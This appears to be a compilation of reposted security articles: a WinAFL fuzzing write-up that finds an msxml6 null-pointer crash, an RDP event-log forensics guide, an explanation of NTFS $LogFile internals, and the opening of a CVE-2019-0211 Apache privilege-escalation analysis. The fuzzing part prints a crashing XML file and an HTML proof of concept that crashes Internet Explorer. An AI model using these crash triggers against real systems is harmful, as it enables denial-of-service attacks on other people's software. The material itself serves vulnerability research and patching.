    os.system("C:\\python27\\python.exe C:\\BugId\\BugId.py C:\\Users\\IEUser\\Desktop\\xml_validate_results\\xmlvalidate.exe -- %s" % testcase)

The above script gives the following output:

Running cBugId to triage the crashes..

Once I ran that for all my crashes, it clearly showed that we’re hitting the same bug. To confirm, let’s fire up windbg:

0:000> g
(a6c.5c0): Access violation - code c0000005 (!!! second chance !!!)
eax=03727aa0 ebx=0012fc3c ecx=00000000 edx=00000000 esi=030f4f1c edi=00000002
eip=6f95025a esp=0012fbcc ebp=0012fbcc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
msxml6!DTD::findEntityGeneral+0x5:
6f95025a 8b4918          mov     ecx,dword ptr [ecx+18h] ds:0023:00000018=????????
0:000> kv
ChildEBP RetAddr  Args to Child              
0012fbcc 6f9de300 03727aa0 00000002 030f4f1c msxml6!DTD::findEntityGeneral+0x5 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\dtd\dtd.hxx @ 236]
0012fbe8 6f999db3 03727aa0 00000003 030c5fb0 msxml6!DTD::checkAttrEntityRef+0x14 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\dtd\dtd.cxx @ 1470]
0012fc10 6f90508f 030f4f18 0012fc3c 00000000 msxml6!GetAttributeValueCollapsing+0x43 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 771]
0012fc28 6f902d87 00000003 030f4f14 6f9051f4 msxml6!NodeFactory::FindAttributeValue+0x3c (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 743]
0012fc8c 6f8f7f0d 030c5fb0 030c3f20 01570040 msxml6!NodeFactory::CreateNode+0x124 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 444]
0012fd1c 6f8f5042 010c3f20 ffffffff c4fd70d3 msxml6!XMLParser::Run+0x740 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\tokenizer\parser\xmlparser.cxx @ 1165]
0012fd58 6f8f4f93 030c3f20 c4fd7017 00000000 msxml6!Document::run+0x89 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 1494]
0012fd9c 6f90a95b 030ddf58 00000000 00000000 msxml6!Document::_load+0x1f1 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 1012]
0012fdc8 6f8f6c75 037278f0 00000000 c4fd73b3 msxml6!Document::load+0xa5 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 754]
0012fe38 00401d36 00000000 00000008 00000000 msxml6!DOMDocumentWrapper::load+0x1ff (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\om\xmldom.cxx @ 1111]
-- cut --
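BugId already does the bucketing, but the idea is simple enough to sketch. Assuming the debugger output for each crash has been saved as text, the hypothetical helpers below pull out the faulting symbol (the module!function+offset: line that WinDbg prints above the faulting instruction) and count how many crashes share it. The log contents are trimmed from the output above and the second file name is made up.

```python
import re
from collections import Counter

# Matches lines such as "msxml6!DTD::findEntityGeneral+0x5:"
SYMBOL_LINE = re.compile(r"^(\w+!\S+?)\+0x[0-9a-fA-F]+:\s*$", re.MULTILINE)


def faulting_symbol(log_text):
    """Return the first 'module!function' symbol line in a log, if any."""
    match = SYMBOL_LINE.search(log_text)
    return match.group(1) if match else None


def bucket_crashes(logs):
    """Count crashes per faulting symbol; logs maps a name to log text."""
    return Counter(faulting_symbol(text) for text in logs.values())


logs = {
    "id_000000_00": (
        "eip=6f95025a esp=0012fbcc ebp=0012fbcc\n"
        "msxml6!DTD::findEntityGeneral+0x5:\n"
        "6f95025a 8b4918 mov ecx,dword ptr [ecx+18h]\n"
    ),
    "id_000001_00": (
        "eip=6f95025a esp=0012fbcc ebp=0012fbcc\n"
        "msxml6!DTD::findEntityGeneral+0x5:\n"
    ),
}
print(bucket_crashes(logs))
```

A single bucket for all inputs is a quick hint that the crashes are duplicates of one bug, although the call stack is still worth a look before discarding any of them.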

Let’s take a look at one of the crashers:

C:\Users\IEUser\Desktop\xml_validate_results\fuzzer01\crashes>type id_000000_00
<?xml version="&a;1.0"?>
<book xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:noNamespaceSchemaLocation="nn.xsd"
      id="bk101">
   <author>Gambardella, Matthew</author>
   <title>XML Developer's Guide</title>
   <genre>Computer</genre>
   <price>44.95</price>
   <publish_date>2000-10-01</publish_date>
   <description>An in-depth look at creating applications with
   XML.</description>

As you can see, if we provide some garbage in either the xml version or the encoding, we will get the above crash. Mitja also minimised the case, as seen below:

<?xml version='1.0' encoding='&aaa;'?>

The whole idea of fuzzing this library was to find a vulnerability that could somehow be triggered within Internet Explorer’s context. After a bit of googling, let’s use the following PoC (crashme.html) and see if it will crash IE11:

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>

var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0");
xmlDoc.async = false;
xmlDoc.load("crashme.xml");
if (xmlDoc.parseError.errorCode != 0) {
   var myErr = xmlDoc.parseError;
   console.log("You have error " + myErr.reason);
} else {
   console.log(xmlDoc.xml);
}

</script>
</body>
</html>

Running that under Python’s SimpleHTTPServer gives the following:

Running cBugId to triage the crashes..

Bingo! As expected, at least with PageHeap enabled we are able to trigger exactly the same crash as with our harness. Be careful not to include that xml in Microsoft Outlook, because it will crash it as well! Also, since the bug is in the library itself, it is reachable from every application that uses it, so a more sexy crash would have had a large attack surface!

Patching

After exchanging a few emails with Mitja, he kindly provided me the following patch which can be applied on a fully updated x64 system:

;target platform: Windows 7 x64
;
RUN_CMD C:\Users\symeon\Desktop\xmlvalidate_64bit\xmlvalidate.exe C:\Users\symeon\Desktop\xmlvalidate_64bit\poc2.xml
MODULE_PATH "C:\Windows\System32\msxml6.dll"
PATCH_ID 200000
PATCH_FORMAT_VER 2
VULN_ID 9999999
PLATFORM win64


patchlet_start
 PATCHLET_ID 1
 PATCHLET_TYPE 2
 
 PATCHLET_OFFSET 0xD093D 
 PIT msxml6.dll!0xD097D
  
 code_start

  test rbp, rbp ;is rbp (this) NULL?
  jnz continue
  jmp PIT_0xD097D
  continue:
 code_end
patchlet_end

Let’s debug and test that patch. I’ve created an account and installed the 0patch agent for developers, and continued by right clicking on the above .0pp file:

Running the crasher with the 0patch console

Once I’ve executed my harness with the xml crasher, I immediately hit the breakpoint:

Hitting the breakpoint under Windbg

From the code above, indeed rbp is null which would lead to the null pointer dereference. Since we have deployed the 0patch agent though, in fact it’s going to jump to msxml6.dll!0xD097D and avoid the crash:

Bug fully patched!

Fantastic! My next step was to fire up winafl again with the patched version which unfortunately failed. Due to the nature of 0patch (function hooking?) it does not play nice with WinAFL and it crashes it.

Nevertheless, this is a sort of “DoS 0day” and as I mentioned earlier I reported it to Microsoft back in June 2017 and after twenty days I got the following email:

MSRC Response!

I totally agree with that decision, however I was mostly interested in patching the annoying bug so I can move on with my fuzzing :o) 
After spending a few hours on the debugger, the only “controllable” user input would be the length of the encoding string:

eax=03052660 ebx=0012fc3c ecx=00000011 edx=00000020 esi=03054f24 edi=00000002
eip=6f80e616 esp=0012fbd4 ebp=0012fbe4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
msxml6!Name::create+0xf:
6f80e616 e8e7e6f9ff      call    msxml6!Name::create (6f7acd02)
0:000> dds esp L3
0012fbd4  00000000
0012fbd8  03064ff8
0012fbdc  00000003

0:000> dc 03064ff8 L4
03064ff8  00610061 00000061 ???????? ????????  a.a.a...????????

The above Unicode string is in fact our entity from the test case, and the number 3 is apparently its length (the signature of the function is Name *__stdcall Name::create(String *pS, const wchar_t *pch, int iLen, Atom *pAtomURN)).

Conclusion

As you can see, spending some time on Microsoft’s APIs/documentation can be gold! Moreover, refactoring some basic functions and pinpointing the issues that affect the performance can also lead to massive improvements!

On that note, I can’t thank Ivan enough for porting AFL to Windows and creating this amazing project. Thanks as well to Axel, who’s been actively contributing and adding amazing features.

Shouts to my colleague Javier (we all have one of those heap junkie friends, right?) for motivating me to write this blog, Richard who’s been answering my silly questions and helping me all this time, Mitja from the 0patch team for building this patch and finally Patroklo for teaching me a few tricks about fuzzing a few years ago!

References

Evolutionary Kernel Fuzzing-BH2017-rjohnson-FINAL.pdf
Super Awesome Fuzzing, Part One

RDP Event Log DFIR

Original text by grayfold3d

A good detection technique to spot Remote Desktop Connections that are exposed to the internet is to scan RDP event logs for any events where the source IP is a non-RFC 1918 address. This provides you a good way to check for locations that may be port forwarding RDP, like work from home users.
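As a rough illustration of that check, the sketch below flags source addresses that fall outside the three RFC 1918 ranges. It is a minimal Python example and not part of the original workflow: the function names and the sample addresses are made up for illustration, and it assumes the source IPs have already been extracted from the RDP event logs.

```python
import ipaddress

# The three private IPv4 ranges defined by RFC 1918.
RFC1918_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_rfc1918(address: str) -> bool:
    """Return True if the address lies inside one of the RFC 1918 ranges."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in RFC1918_NETWORKS)


def non_private_sources(addresses):
    """Keep only the source IPs that are NOT RFC 1918 addresses.

    Note: loopback and link-local addresses are also reported by this
    simple filter; a real search would probably want to exclude them.
    """
    return [address for address in addresses if not is_rfc1918(address)]


if __name__ == "__main__":
    # Hypothetical source IPs pulled from RDP events.
    sample = ["192.168.1.20", "10.0.0.5", "172.32.0.1", "203.0.113.7"]
    for address in non_private_sources(sample):
        print("possible internet-exposed RDP source:", address)
```

Checking the three networks explicitly, rather than relying on a broader "is private" test, keeps the filter aligned with the RFC 1918 wording used here.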

During a recent investigation involving Remote Desktop Connections, I discovered some behavior that limited this search functionality and was contrary to what I’d observed in previous cases and seen documented in other blogs. I’ve done some testing over the last few days and thought I’d pass along what I’d found. 

Prior Observations

I refer to the following two sources whenever I need a refresher on RDP logging. They both do a great job of explaining what gets logged at the various stages of an RDP connection: Login, Logoff, Disconnect, Reconnect, etc.

During previous investigations, I’d observed Event ID 1149 in the TerminalServices-RemoteConnectionManager/Operational log occurring as soon as an RDP connection was established. This event was logged prior to credentials being entered during the login process and my interpretation was that this indicated that the RDP client has connected to the RDP host successfully. It did not indicate that a login had successfully occurred. 
This made Event ID 1149 very valuable as it gave you the means to spot failed logins or brute force login attempts even if auditing of failed logins was not enabled. As mentioned above, the presence of a non-RFC 1918 address in one of these logs is a good indicator that that device has been in a location with RDP exposed to the internet.

Event ID 1149 was followed by a series of other events which varied depending on whether a previous session was being reconnected and whether the authentication was successful.

During successful authentication, you observe Event ID 4624 in the Windows Security log. Note there is a 4624 event where the “Logon Type” is 3. This occurs because this connection is using Network Level Authentication. This will be followed by another 4624 Event with logon type 10 (or 7 for reconnects). (*Thanks to @securitycatnip for catching an error in the original post.)

Event ID 21 and 22 (new connections) are logged in the TerminalServices-LocalSessionManager/Operational log.

For failed logins, Event ID 1149 would be followed by Event ID 4625 in the Windows Security Log.

An important point is that Event ID 4625 (for login failures) is not logged by default in desktop operating systems like Windows 7, 8, and 10.

Current Observations

During a recent investigation, I noticed that Event ID 1149 was not being logged when the login was unsuccessful. This was observed when connecting to a Windows 10 device. If the login succeeded, the 1149 event was logged as seen previously. In both cases, Event ID 261 is logged in the TS RemoteConnectionManager/Operational log but unfortunately, this doesn’t give us any information on who was attempting to connect.

After performing some additional testing and reviewing notes from previous cases, I’ve found the following. Please note, not all Operating Systems or OS versions are accounted for here as I tested what I had available.

Event ID 1149 was not logged prior to successful authentication and only occurs if authentication is successful on the following Operating Systems:

  • Windows Server 2012
  • Windows Server 2016
  • Windows 7
  • Windows 8.1
  • Windows 10 (version 1803)

Event ID 1149 was logged prior to successful authentication on the following Operating Systems:

  • Windows Server 2008
  • Windows SBS Server 2011

Additional Log Sources

I performed a timeline of the Event Logs after a series of failed and successful RDP connections to see if anything else was logged that might be helpful in identifying failed RDP login attempts. I discovered that the RemoteDesktopServices-RdpCoreTS/Operational log does log Event ID 131 when the RDP connection is first established. This occurs prior to authentication like Event ID 1149 did previously and while there is no workstation name or user account associated with this log entry, it does provide the connecting IP. Unfortunately, this log channel does not exist in Windows 7.

I touched on Network Level Authentication above when discussing the “Logon Type” field recorded in the Security log. NLA requires the client to authenticate before connecting to the host. An easy way to tell if NLA is disabled is that when connecting to a host, you see the login screen of that device before entering credentials. This allows an attacker to see who is currently logged in, other user accounts on the PC and the domain name.

NLA really should be enabled on most devices but if it is not, you can find an additional event in the TerminalServices-RemoteConnectionManager/Admin log. Event ID 1158 will also display the source IP. While this log is available in Windows 7, I was not able to generate Event ID 1158 when connecting to a Windows 7 PC without NLA.

Closing

One final tip. If you’re doing any RDP testing and want to force your client to connect without NLA, you can do so by editing the RDP connection file. To do so, save the .RDP file and open it in Notepad or another text editor. Paste the following line anywhere in the file:
enablecredsspsupport:i:0

If you’ve got any feedback, feel free to share. I’m still on the lookout for a good way to identify brute force RDP attempts on default Windows 7 configurations so if you’ve got any thoughts on that, let me know.

How the $LogFile works?

Original text by MSUHANOV

In the official NTFS implementation, all metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called write-ahead logging.

The logged metadata is stored in a file called “$LogFile”, which is found in a root directory of an NTFS file system.

Currently, there is not much documentation available for this file. Most sources are either too high-level (describing the logging and recovery processes in general) or just contain the layout of key structures without further description.

The process of metadata logging is based on two components: the log file service (LFS) and the NTFS client of the LFS (both are implemented as a part of the NTFS driver).

The LFS provides an interface for its clients to store a buffer in a circular (“infinite”) area of a log file and to read such buffers from that log file. In particular, the following simplified types of actions are supported:

  • store a buffer (client data) as a log record, return its log sequence number (LSN);
  • store a buffer (client data) as a restart area, return its LSN;
  • if a log file is full, raise an exception for a client;
  • mark previously stored data as unused;
  • given an LSN, locate a stored buffer (client data) and return it;
  • given an LSN, find a next LSN for the same client and return it (forward search);
  • given an LSN, find a previous LSN for the same client and return it (backward search).

As you can see, the LFS is the data management layer for the NTFS logging component; the LFS doesn’t do the actual logging of metadata operations. Each buffer received from a client is opaque to the LFS (the LFS is only aware of the type of this buffer: whether it’s a log record or a client restart area).

The actual logging (and recovery) is implemented as a part of the NTFS client of the LFS. Each buffer sent from this component to the LFS contains something related to a transaction. Here, a transaction is a set of metadata changes necessary to complete a specific high-level operation.

For example, the following metadata changes are combined as a transaction when a file is renamed:

  1. delete an index entry (with an old file name) for a target file from a file name index within a parent directory;
  2. delete the $FILE_NAME attribute (with an old file name) from a target file record;
  3. create the $FILE_NAME attribute (with a new file name) in a target file record;
  4. add an index entry (with a new file name) for a target file in a file name index within a parent directory.

If all of these changes were applied to a volume successfully, then the transaction is marked as forgotten.

But before we get to the format of metadata changes used by the NTFS client, we need to dissect on-disk structures of the LFS.

First of all, since each client buffer stored in a log file is identified by an LSN, it’s important to understand how these LSNs are generated by the LFS.

Each LSN is a 64-bit number containing the following components: a sequence number and an offset. The offset is stored in the lower part of an LSN; its value is a number of 8-byte increments from the beginning of a log file. This offset points to an LFS structure containing a client buffer and related metadata; this structure is called an LFS record. The sequence number is stored in the higher part; it’s a value from a counter which is incremented when a log file is wrapped (when a new structure is written to the beginning of the circular area, not to the end of this area).

The number of bits reserved for the sequence number part of an LSN is variable: it depends on the size of a log file (and it’s recorded in it).

For example, if 44 bits are reserved for the sequence number part and the LSN is 2124332, then the sequence number is 2 and the offset is 27180 8-byte increments (217440 bytes).
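The same arithmetic can be written as a short Python sketch. The function name split_lsn is made up for illustration; the only inputs are the LSN and the number of bits reserved for the sequence number, as described above.

```python
def split_lsn(lsn: int, seq_bits: int):
    """Split a 64-bit LSN into (sequence number, offset in 8-byte units, offset in bytes).

    seq_bits is the number of high bits reserved for the sequence number;
    the remaining low bits hold the offset, counted in 8-byte increments.
    """
    offset_bits = 64 - seq_bits
    sequence = lsn >> offset_bits
    offset_units = lsn & ((1 << offset_bits) - 1)
    return sequence, offset_units, offset_units * 8


if __name__ == "__main__":
    # The example from the text: 44 bits for the sequence number.
    print(split_lsn(2124332, 44))
```

With 44 bits for the sequence number, 20 bits remain for the offset, so the LSN is simply shifted right by 20 and masked with 0xFFFFF.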

The LSNs have an important property: they are always increasing. An LSN for a new entry is always greater than an LSN for an older entry (technically, these numbers can overflow, but they won’t, because it’s practically impossible to reach the 64-bit limit).

An LFS record is a structure containing a header and client data. The following data is stored in the LFS record header: an LSN for this record, a previous LSN for the same client, an LSN for the undo operation for the same client, a client ID, a transaction ID, a record type (a log record or a client restart area), length of client data, various flags. Many values mentioned before are specified by the client.

LFS records are written to LFS record pages. Each LFS record page is 4096 bytes in size (equal to the page size) and contains a header (the first four bytes are “RCRD”) and one or more LFS records. Since client data can be large, two or more adjacent LFS record pages may be required to store one LFS record (thus, an LFS record can be larger than an LFS record page; only the first segment has the LFS record header).

Each LFS record page is protected by an update sequence array, which is used to detect failed (torn) writes. Here is a description of the protection process (source):

The update sequence array consists of an array of n USHORT values, where n is the size of the structure being protected divided by the sequence number stride. The first word contains the update sequence number, which is a cyclical counter of the number of times the containing structure has been written to disk. Next are the n saved USHORT values that were overwritten by the update sequence number the last time the containing structure was written to disk.

Each time the protected structure is about to be written to disk, the last word in each sequence number stride is saved to its respective position in the sequence number array, then it is overwritten with the next update sequence number. After the write, or whenever the structure is read, the saved word from the sequence number array is restored to its actual position in the structure. Before restoring the saved words on reads, all the sequence numbers at the end of each stride are compared with the actual sequence number at the start of the array. If any of these comparisons are not equal, then a failed multisector transfer has been detected.

(It should be noted that the stride is 512 bytes, even if an underlying drive has a larger sector size. Also, the size of an update sequence array isn’t n, but n+1.)
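The protection scheme quoted above can be sketched in Python as follows. This is an illustration under stated assumptions, not the driver's code: the function names are invented, words are assumed to be little-endian, and the position of the update sequence array inside the page (usa_offset) is passed in by the caller rather than parsed from a header.

```python
import struct

STRIDE = 512  # sequence number stride in bytes, as stated in the text


def protect(page: bytes, usa_offset: int, usn: int) -> bytes:
    """Prepare a page for writing: save the last word of every stride into
    the update sequence array, then overwrite it with the sequence number."""
    buf = bytearray(page)
    strides = len(buf) // STRIDE
    struct.pack_into("<H", buf, usa_offset, usn)   # slot 0: update sequence number
    for i in range(strides):
        tail = (i + 1) * STRIDE - 2                # last word of stride i
        slot = usa_offset + 2 * (i + 1)            # slot i+1 holds the saved word
        buf[slot:slot + 2] = buf[tail:tail + 2]
        struct.pack_into("<H", buf, tail, usn)
    return bytes(buf)


def unprotect(page: bytes, usa_offset: int) -> bytes:
    """Check a page after reading and restore the saved words.

    Raises ValueError if any stride does not end with the expected
    sequence number, which indicates a failed (torn) write."""
    buf = bytearray(page)
    strides = len(buf) // STRIDE
    (usn,) = struct.unpack_from("<H", buf, usa_offset)
    tails = [(i + 1) * STRIDE - 2 for i in range(strides)]
    for tail in tails:
        (found,) = struct.unpack_from("<H", buf, tail)
        if found != usn:
            raise ValueError("torn write detected at offset %d" % tail)
    for i, tail in enumerate(tails):
        slot = usa_offset + 2 * (i + 1)
        buf[tail:tail + 2] = buf[slot:slot + 2]
    return bytes(buf)
```

For a 4096-byte page there are 8 strides, so the array occupies 9 words (n+1), which matches the remark above about its size.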

Here is the layout of a typical LFS record page:

lfs-record-page

Here is the layout of two LFS record pages containing a large LFS record:

lfs-record-pages

Finally, the circular (“infinite”) area of a log file consists of many LFS record pages. As described before, LFS records written to a log file can wrap, so a large LFS record starting in the last LFS record page also hits the first LFS record page of the circular area.

lfs-infinite.png

When writing a new LFS record into a current LFS record page, existing LFS records in this page can be lost because of a torn write or a system crash. Thus, data that was successfully stored before can be lost because of a new write.

In order to protect against such scenarios, a special area exists in a log file. It’s located before the circular area.

In the version 1.1 of the LFS, a special area consists of two pages, which are used to store two copies of a current LFS record page. Before putting a new LFS record into a current LFS record page, this page is stored in the special area (the first copy). After putting a new LFS record into a current LFS record page, the modified page is also written to the special area (the second copy, the first copy isn’t overwritten by the second one).

If a torn write or a system crash occurs when writing the second copy, the first copy (without a new LFS record) will be available for the recovery. If everything is okay and the LFS needs the special area for a new update, then the second copy is written to the circular area of a log file (and the special area becomes available for a new update).

These two copies of a current LFS record page are called tail copies (because they always represent the latest LFS record page to be written to the circular area). The latest tail copy isn’t moved to the circular area immediately. So, in order to get a full set of LFS record pages during the recovery, the LFS should apply the latest tail page (or the valid one, if another tail page is invalid) to the circular area.

In the version 2.0 of the LFS, a special area consists of 32 pages. When the LFS needs to put a new LFS record into a current LFS record page or when the LFS prepares a new LFS record page with a single LFS record, the updated page (containing a new LFS record) or the new page is simply written to the special area (to an unused page).

If a torn write or a system crash occurs when writing that page, an older version of the same page from the special area is used. Occasionally, LFS record pages with latest data are moved to the circular area (and corresponding pages in the special area are marked as unused).

I don’t know what LFS record pages in this special area are called. I call them fast pages.

The new version of the LFS requires fewer writes by reducing the number of page transfers to the circular area. It should be noted that the version of a log file is downgraded to 1.1 during the clean shutdown by default (so an NTFS file system can be mounted using a previous version of Windows).

Also, Microsoft is going to release the version 3.0 of the LFS. This version will be used on DAX volumes. When a log file is mapped in the DAX mode, integrity of its pages is going to be protected using the CRC32 checksum (and there would be no update sequence arrays, because they won’t work well with byte-addressable memory). This will make things faster (no paging writes).

Finally, a log file begins with two restart pages, each 4096 bytes in size (again, it’s the page size; the first four bytes of each page are “RSTR”). These pages are also protected with update sequence arrays.
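As a small illustration of the two page signatures mentioned so far, the sketch below walks a log file image in 4096-byte steps and labels each page. The function names are invented for this example, the page size is taken from the text, and anything that is neither “RSTR” nor “RCRD” is simply reported as unknown.

```python
PAGE_SIZE = 4096  # page size used throughout the text


def page_kind(page: bytes) -> str:
    """Classify a page by its first four bytes."""
    signature = page[:4]
    if signature == b"RSTR":
        return "restart"
    if signature == b"RCRD":
        return "record"
    return "unknown"


def iter_pages(data: bytes):
    """Yield (file offset, page kind) for every full page in the data."""
    for offset in range(0, len(data) - PAGE_SIZE + 1, PAGE_SIZE):
        yield offset, page_kind(data[offset:offset + PAGE_SIZE])


if __name__ == "__main__":
    # Synthetic data only: two restart pages followed by one record page.
    blank = bytes(PAGE_SIZE - 4)
    image = (b"RSTR" + blank) * 2 + b"RCRD" + blank
    for offset, kind in iter_pages(image):
        print(hex(offset), kind)
```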

A restart page contains the LFS version number, a page size, and a restart area (not to be confused with a client restart area).

A restart area is a structure containing the latest LSN used (at the time when this structure was written), the number of clients of the LFS, the list of clients of the LFS, the number of bits used for the sequence number part of every LSN, as well as some data for sanity checks and forward compatibility (an offset of the first LFS record within an LFS record page, which is also an offset of the continuation of client data from a previous LFS record page, and a size of an LFS record header; both offsets allow unsupported fields to be ignored in LFS record pages and in LFS records).

A list of clients is composed of client records. A client record contains the oldest LSN required by this client, the LSN of the latest client restart area, the name of this client (as well as other information about this client). Currently, the only client is called “NTFS”.

Two restart pages provide reliability against a possible failure (a torn write or a system crash). These pages aren’t necessarily synchronized.

Here is the generic layout of a log file:

lfs-layout.png

When the LFS is asked to provide initial data for its client, it will read and return the latest client restart area according to an LSN recorded in the appropriate client record. (Later, during the logging operation, the LFS won’t touch the oldest LFS record required by each client.)

A client receives its latest restart area, interprets it (remember that the LFS is unaware of the client data format), and decides what actions (if any) must be taken. If a log record is needed, then a client asks the LFS to provide this record (as a buffer) by its LSN.

The NTFS client tells the LFS to write a client restart area at the end of the checkpoint operation. During a checkpoint, the NTFS client writes a set of log records containing data about current transactions followed by a restart area, which points to every piece of that data (using LSNs). During the recovery, the NTFS client uses this data to decide which transactions are committed and which aren’t: committed transactions must be performed again using their redo data (there is a chance that this data didn’t hit the volume), while uncommitted transactions must be rolled back using their undo data.

And now we can take a look at the format of client data!

There are three versions of the NTFS client data format: 0.0, 1.0, and 2.0.

The last one seems to be under development, because it’s not enabled yet. This new version removes redundant open attribute table dumps and attribute names dumps, which were previously made during a checkpoint (the same data can be reconstructed from log records, so there is no reason to waste the space and link these dumps to a client restart area).

Currently, only the first two versions are used: 0.0 and 1.0. There are no significant differences between them. The most notable difference, although not a really significant one, is the format of open attribute entries.

A client restart area contains major and minor version numbers of the NTFS client data format used, an LSN to be used as a starting point for the analysis pass (when the NTFS driver builds a table of transactions and a table of dirty data ranges). Also, a client restart area contains LSNs for a transaction table dumped to a log file from memory (this table can be absent as well), an open attribute table dumped to a log file from memory, a list of attribute names dumped to a log file from memory, and a dirty page table dumped to a log file from memory (which is used to track dirty data ranges).

An open attribute table and a list of attribute names reference a nonresident attribute opened for a log operation. An entry from an open attribute table contains an $MFT reference number for the file record whose nonresident attribute has been opened and a type code of this attribute (e.g., $DATA). An entry from a list of attribute names contains a Unicode name of a nonresident attribute opened along with an index of a corresponding entry in the open attribute table.

And a log record written during an operation on a nonresident attribute contains an index of a target attribute in the open attribute table. Based on this information (an $MFT file reference, an attribute code, and an attribute name), it’s possible to locate a target attribute. Also, a log record contains an offset within a target attribute at which new data is going to be written.

It should be noted that no table referenced by a client restart area is in the up-to-date state. New items from log records after the client restart area should be accounted for in these tables.

A log record is an actual descriptor of a logged operation. A log record contains a redo type and data (can be empty), an undo type and data (can be empty too), a number of a target $MFT file record segment (for operations on resident attributes and on $MFT data in general), an index of a target attribute within the open attribute table (for operations on nonresident attributes), and several fields used to calculate an offset within a target.

Redo data is written when a transaction is committed, undo data is written when a transaction is rolled back (to bring things back to their previous state). There are some exceptions, however: when a nonresident attribute is opened, its open attribute record is stored as redo data and its Unicode name is stored as undo data.

Here is a full list of log operation types (as of Windows 10, build 18323):

Noop
CompensationLogRecord
InitializeFileRecordSegment
DeallocateFileRecordSegment
WriteEndOfFileRecordSegment
CreateAttribute
DeleteAttribute
UpdateResidentValue
UpdateNonresidentValue
UpdateMappingPairs
DeleteDirtyClusters
SetNewAttributeSizes
AddIndexEntryRoot
DeleteIndexEntryRoot
AddIndexEntryAllocation
DeleteIndexEntryAllocation
WriteEndOfIndexBuffer
SetIndexEntryVcnRoot
SetIndexEntryVcnAllocation
UpdateFileNameRoot
UpdateFileNameAllocation
SetBitsInNonresidentBitMap
ClearBitsInNonresidentBitMap
HotFix
EndTopLevelAction
PrepareTransaction
CommitTransaction
ForgetTransaction
OpenNonresidentAttribute
OpenAttributeTableDump
AttributeNamesDump
DirtyPageTableDump
TransactionTableDump
UpdateRecordDataRoot
UpdateRecordDataAllocation
UpdateRelativeDataIndex
UpdateRelativeDataAllocation
ZeroEndOfFileRecord

Here is a decoded transaction used to rename a file (from “aaa.txt” to “bbb.txt”).

It should be noted that updates to some attributes can be recorded partially. For example, an update to the $STANDARD_INFORMATION attribute can record data starting from the M timestamp (and the C timestamp, which is stored before the M timestamp, will be absent in the redo/undo data).

The only thing left is the meaning of every log operation. Not today!


Update (2019-02-17):

How long does it take for old data to become overwritten with new data?

In one of my tests with Windows 10, it took 16 minutes. In another test with Windows 10, it took 5 hours and 20 minutes. In both tests, mouse movements were the only user activity.

CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

Original text by cfreal

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), scoreboard, which contains various information such as the workers’ PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447, 
  generation = 0, 
  quiescing = 0 '\000', 
  not_accepting = 0 '\000', 
  connections = 0, 
  write_completion = 0, 
  lingering_close = 0, 
  keep_alive = 0, 
  suspended = 0, 
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills old workers and replaces them with new ones. At this point, every old worker’s bucket value will be used by the main process to access one of its own arrays, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
